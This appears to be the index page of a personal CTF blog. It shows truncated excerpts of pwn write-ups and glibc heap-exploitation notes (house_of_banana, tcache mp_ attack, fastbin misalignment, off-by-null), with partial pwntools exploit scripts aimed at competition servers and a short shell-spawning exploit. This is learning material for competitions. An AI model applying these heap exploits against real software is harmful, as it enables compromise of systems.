Blog of cat03
house_of_banana source code analysis
Published 2021-10-04
Compared with house of orange, house of banana shifts the focus of the attack to ld. It is mostly used under extreme conditions, for example when only fairly large chunks can be requested and tcache has to be avoided; that is when this mechanism comes in. When a program finishes, or calls exit() directly, it performs resource-cleanup work, and the target of this attack is the fini_array part of that; you can look up the basics here. The source below comes from glibc 2.23.
How the functions in fini_array are executed: first load the source into the debugger
giles@ubuntu:~/Desktop/house_of_banana $ echo $ELF
/home/giles/real_source/glibc-2.23/elf
giles@ubuntu:~/Desktop/house_of_banana $ gdb a.out -d $ELF
Next, look at the fini_array functions and set a breakpoint
pwndbg> elfh ...
PWN: quickly loading libc
Published 2021-10-02
I wrote this one myself, though it arguably borrows a bit from lemon's. The main logic is to assemble those two commands through some shell checks. I don't know how well it works; if needed later I will combine it with glibc-all-in-one, which might be more convenient.
patchpwn - A shell script to replace the libc of a pwn binary in CTF
Abstract
This simple shell script is based on patchelf and glibc-all-in-one. So, to use patchpwn, you need to ensure that you have installed them and that they work normally.
Usage
Before specifying the libc version, you should download the libc via glibc-all-in-one, then edit this shell script and replace the LIBC_DIR variable to ada ...
Chang'an Cup, Lvcheng Cup, DASCTF Sept pwn section
Published 2021-09-30
I'm tired, and maybe a bit xxxx too; I want to set aside the things in front of me and do some things freely.............
Chang'an Cup
Don't blame me, I only solved this one, but nobody else solved the others either. I asked a senior: the problems came from Nu1L, and the final ranking was around 20th.
baigei
There is a logic problem that allows the size to be reset.
#!/usr/bin/env python
from pwn import *
binary = "./main"
lib = "./libc-2.27.so"
# p = process(binary)
p = remote("113.201.14.253","")
elf = ELF(binary)
libc = ELF(lib)
# co ...
Great Wall Cup 2021 pwn
Published 2021-09-20
I had not learned the technique for the first problem, and it took me a long time to hit exit_hook on my own. The second problem, orw, is fairly simple.
K1ng_in_h3Ap_I
exp
#!/usr/bin/env python
from pwn import *
binary = "./pwn"
lib = "/lib/x86_64-linux-gnu/libc.so.6"
p = process(binary)
p = remote("47.104.175.110","20066")
# flag{a3a6d84e-30b3-41ce-a6bc-158e2a975f73}
elf = ELF(binary)
libc = ELF(lib)
# con ...
Blue Hat Cup PWN
Published 2021-09-17
Cover
exp
#!/usr/bin/env python
from pwn import *
p = process("./pwn")
raw_input()
payload = p32(0x80484D6+1)
payload += "\x30"
p.send(payload)
p.send("/bin/sh\x00")
p.interactive()
Originally I wanted to change the push 0xa of the next read() so that it would overflow the stack, but that did not work. So I turned to attacking the plt table instead: puts(ptr) -> system(ptr)
hangman (hang that man)
exp
#!/usr/bin/env python
from pwn imp ...
byteCTF2020_PWN
Published 2021-09-15
easyheap
exp
#!/usr/bin/env python
from pwn import *
binary = "./easyheap"
lib = "/usr/lib/x86_64-linux-gnu/libc-2.31.so"
p = process(binary)
elf = ELF(binary)
libc = ELF(lib)
# context.log_level = "debug"
s = lambda buf: p.send(buf)
sl = lambda buf: p.sendline(buf)
sa = lambda delim, buf: p.sendafter(delim, buf)
sal = lambd ...
tcache: attacking mp_ and source code analysis
Published 2021-09-08
tcache: attacking mp_
If the program forces you to request only large chunks, a largebin attack or unsortedbin attack can overwrite a variable with a large value, but it is hard to get an allocation inside libc. The method described in this article forces large requests to also go through tcache get/put, so the tcache attack techniques can then be used to allocate libc space.
tip: the source below comes from glibc 2.31
# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
# define MAYBE_INIT_TCACHE() \
  if (__glibc_unlikely (tcache == NULL)) \
    tcache_init();
static __always_inline void *
tcache_get (size_t tc_idx)
{
  tcache_entry ...
fastbin size misalignment construction and source code analysis
Published 2021-09-04 | pwn
fastbin size misalignment construction
This is mainly in contrast to tcache, where changing the fd pointer to a libc address lets you allocate that region directly. glibc 2.23 has no tcache, but you can still allocate that region by constructing a misaligned size inside libc.
/* offset 2 to use otherwise unindexable first 2 bins */
#define fastbin_index(sz) \
  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
static void *
_int_malloc (mstate av, size_t bytes)
{
  ...
  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = f ...
Xiangyun Cup pwn
Published 2021-09-02
Note
Since there is no free, I attacked it following the house_of_orange approach.
#!/usr/bin/env python
from pwn import *
re = 1
context.log_level = "debug"
if re:
    p = remote("47.104.70.90", "25315")
    libc = ELF("./libc-2.23.so")
else:
    binary = "./note"
    p = process(binary)
    lib = "/lib ...
off_by_null source code analysis
Published 2021-08-28 | pwn
off by null: the first way to exploit it
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <assert.h>
int main()
{
    uint8_t* t1;
    uint8_t* t2;
    uint8_t* b1;
    uint8_t* b2;
    uint8_t* A = malloc(0x18);
    uint8_t* B = malloc(0x100);
    uint8_t* C = malloc(0x100);
    malloc(0); // barrier
    *(uint64_t*)(B+0xf0) = 0x100;
    free(B);
    A[0x18] = 0x00; // off by null
    b1 = malloc(0x88);
    b2 = malloc(0x18);
    free(b1);
    free(C); // trigger
    t1 = mal ...
©2020 - 2022 By cat03
Framework Hexo | Theme Butterfly